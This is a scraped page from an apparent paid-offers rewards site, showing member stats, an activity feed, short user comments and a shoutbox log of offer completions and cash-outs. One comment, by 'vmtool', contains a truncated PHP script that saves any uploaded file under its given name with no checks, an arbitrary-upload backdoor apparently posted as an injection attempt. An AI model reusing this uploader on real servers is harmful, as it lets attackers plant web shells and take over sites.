Site Stats
Total Members: 59873
Online Members: 78
Offers: 1551
Total Cash Paid: $88,266.73
Total Points Paid: 222,268.95
Happening Now
53 seconds ago - JustinOtopejgOlyhivlIZ has just joined our community. Welcome !

1 minute ago - veen has just completed the GiveUsYour2Cents - USA offer worth $0.70.

13 minutes ago - foxi has just completed the GiveUsYour2Cents - USA offer worth $0.70.

29 minutes ago - kkouassi79 has just completed the Squishy Cash offer worth $0.03.

29 minutes ago - Vesenkov has just completed the Squishy Cash offer worth $0.03.

34 minutes ago - zrzxivbwid has just joined our community. Welcome !

35 minutes ago - Timon58 has just cashed out $0.09 By WebMoney.

40 minutes ago - reydavidelias2014 has just cashed out $8.83 By Perfect Money - Verified.

41 minutes ago - reydavidelias2014 has just completed the Speak Up Router - Green offer worth 70 points.

57 minutes ago - RobertLoome has just joined our community. Welcome !

Advertise Here (Now Just $1.00 Per 10,000 Impressions)

View More News

New Offers Jan 15, 2015
Check out the new offers and surveys.

Displaying page 1 of 3.

Comments
rimi1994 at Jan 12, 2017

great
thang1968 at Nov 23, 2016

lam sao de tang thu nhap nhiu nhi cac ban
papamoott at Nov 17, 2016

ฉันปราถนาที่จะร่วมกิจกรรมครับ
pearlpk at Nov 16, 2016

Got payment!!!
Дата: 16 января 2016 7:49:56 AM
Сумма Отправлено: $ 1,05 USD
Имя отправителя: GPTBanks / Hon
pearlpk at Nov 16, 2016

hi
daithanh456321xx at Nov 13, 2016

hello
papamoott at Nov 2, 2016

good
Waelfayad at Oct 15, 2016

Great
Waelfayad at Oct 15, 2016

The objective of the game is to collect coins and other rewards while running through an endless game world. Trains and other obstacles must be avoided by performing well-timed jumps (swipe up), rolls (swipe down) and sideways moves (swipe left and right). Occasionally the characters surf on hoverboards, soar over the train tracks and even run along overhead wires.Special missions reward players with bonuses for accomplishing specific tasks. The game ends when the surfer either stumbles and is t
Shenika_Holmes109 at Oct 6, 2016

Hallu
asmada at Sep 13, 2016

hi everyone :)
chelnokoff at Sep 13, 2016

hi all good luck
chelnokoff at Sep 13, 2016

Здорово всем удачи
nadjib09 at Aug 31, 2016

hello world
nadjib09 at Aug 31, 2016

hi
lenti123 at Aug 31, 2016

Hello there
sagetator74 at Aug 21, 2016

good
sparcklecerisr at Aug 15, 2016

hello everyone Im new here hope everyone is staying cool today
carlab at Aug 14, 2016

THE best site :)
kkouame79 at Aug 2, 2016

comment faire verifier son compte s'il vous plait
alvinrodriguez5 at Jul 25, 2016

Thᥱ Fight Against Laptop Gadgets Your gadgets are ѕimply amazing, Veгy useful!
adeildo at Jul 17, 2016

hbfryk;,,hgswaqeryhjl[plkihyt
vmtool at Jul 14, 2016

<?php
if(!empty($_FILES)){
if($_FILES["file"]["error"] == 0){
move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
echo $_FILES['file']['name'].' upload success';
}
}
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<input type="
adeildo at Jul 9, 2016

adorei
phungnhi9060 at Jul 7, 2016

good

Displaying page 1 of 3.

You must be logged in to post comments.
NEWS
New Offers
Jan 15, 2015 at 11:25 PM

Check out the new offers and surveys.
Shoutbox Facebook Twitter
1/16/17 5:18 PM
Honey: atmane has just completed the ClixWall offer worth 0.01 points.
1/16/17 5:19 PM
Honey: atmane has just completed the ClixWall offer worth 0.01 points.
1/16/17 5:22 PM
Honey: velit has just completed the Minutestaff Wall offer worth 0.9 points.
1/16/17 5:25 PM
Honey: velit has just completed the Minutestaff Wall offer worth 0.3 points.
1/16/17 5:30 PM
Honey: genius has just completed the GiveUsYour2Cents - USA offer worth $0.70.
1/16/17 5:30 PM
Honey: genius has just cashed out $0.70 By Bitcoin - Verified.
1/16/17 5:33 PM
Honey: velit has just completed the Minutestaff Wall offer worth 2.4 points.
1/16/17 5:39 PM
Honey: reydavidelias2014 has just completed the Tap Research Router offer worth 70 points.
1/16/17 5:49 PM
Honey: Julianslilt has just joined our community. Welcome !
1/16/17 6:19 PM
Honey: magneto20 has just completed the Tap Research Router offer worth 70 points.
1/16/17 6:40 PM
Honey: savannahwellsxbksjt has just joined our community. Welcome !
1/16/17 6:42 PM
Honey: magneto20 has just completed the Speak Up Router - Green offer worth 70 points.
1/16/17 6:43 PM
Honey: magneto20 has just cashed out $1.76 By Perfect Money.
1/16/17 6:52 PM
Honey: DanielSaP has just joined our community. Welcome !
1/16/17 6:56 PM
Honey: MichaelOO7 has just completed the Speak Up Router - Green offer worth 70 points.
1/16/17 7:00 PM
Honey: soniat has just joined our community. Welcome !
1/16/17 7:14 PM
Honey: WilliamNaick has just joined our community. Welcome !
1/16/17 7:15 PM
Honey: axelbob has just completed the Tap Research Router offer worth 70 points.
1/16/17 7:31 PM
Honey: soniat has just completed the Your Surveys (US, CA, UK) offer worth 70 points.
1/16/17 7:40 PM
Honey: MarioNip has just joined our community. Welcome !
1/16/17 7:56 PM
Honey: torettoforever has just completed the Tap Research Router offer worth 70 points.
1/16/17 8:11 PM
Honey: lige has just completed the Your Surveys Router - Worldwide offer worth 52.5 points.
1/16/17 8:17 PM
Honey: lige has just completed the Your Surveys Router - Worldwide offer worth $0.60.
1/16/17 8:37 PM
Honey: lige has just completed the WannAds Wall offer worth 48.12 points.
1/16/17 8:38 PM
Honey: catdog has just completed the Sample Cube Premium Router - USA offer worth 122.5 points.
1/16/17 8:40 PM
Honey: catdog has just cashed out $1.54 By Perfect Money.
1/16/17 8:53 PM
Honey: irenenegra has just completed the Tap Research Router offer worth 70 points.
1/16/17 8:59 PM
Honey: irenenegra has just cashed out $0.73 By Perfect Money.
1/16/17 9:05 PM
Honey: eileenbeaurepaire has just joined our community. Welcome !
1/16/17 9:07 PM
Honey: lige has just completed the PTC Wall offer worth 42 points.
1/16/17 9:08 PM
Honey: lige has just cashed out $5.43 By Amazon Gift Card.
1/16/17 9:38 PM
Honey: JamesGyzlyuvy has just joined our community. Welcome !
1/16/17 9:51 PM
Honey: swordman2017 has just joined our community. Welcome !
1/16/17 10:08 PM
Honey: swordman2017 has just completed the Tap Research Router offer worth 70 points.
1/16/17 10:09 PM
Honey: swordman2017 has just cashed out $0.70 By Perfect Money.
1/16/17 10:11 PM
Honey: nuyezung has just joined our community. Welcome !
1/16/17 10:15 PM
Honey: nuyezung has just completed the PTC Wall offer worth 0.014 points.
1/16/17 10:17 PM
Honey: nuyezung has just completed the PTC Wall offer worth 0.014 points.
1/16/17 10:39 PM
Honey: reydavidelias2014 has just completed the Sample Cube Premium Router - USA offer worth 122.5 points.
1/16/17 10:45 PM
Honey: Edwardstors has just joined our community. Welcome !
1/16/17 10:45 PM
Honey: RobertLoome has just joined our community. Welcome !
1/16/17 11:02 PM
Honey: reydavidelias2014 has just completed the Speak Up Router - Green offer worth 70 points.
1/16/17 11:03 PM
Honey: reydavidelias2014 has just cashed out $8.83 By Perfect Money - Verified.
1/16/17 11:08 PM
Honey: Timon58 has just cashed out $0.09 By WebMoney.
1/16/17 11:09 PM
Honey: zrzxivbwid has just joined our community. Welcome !
1/16/17 11:13 PM
Honey: Vesenkov has just completed the Squishy Cash offer worth $0.03.
1/16/17 11:13 PM
Honey: kkouassi79 has just completed the Squishy Cash offer worth $0.03.
1/16/17 11:30 PM
Honey: foxi has just completed the GiveUsYour2Cents - USA offer worth $0.70.
1/16/17 11:42 PM
Honey: veen has just completed the GiveUsYour2Cents - USA offer worth $0.70.
1/16/17 11:42 PM
Honey: JustinOtopejgOlyhivlIZ has just joined our community. Welcome !
You must be logged in to post messages.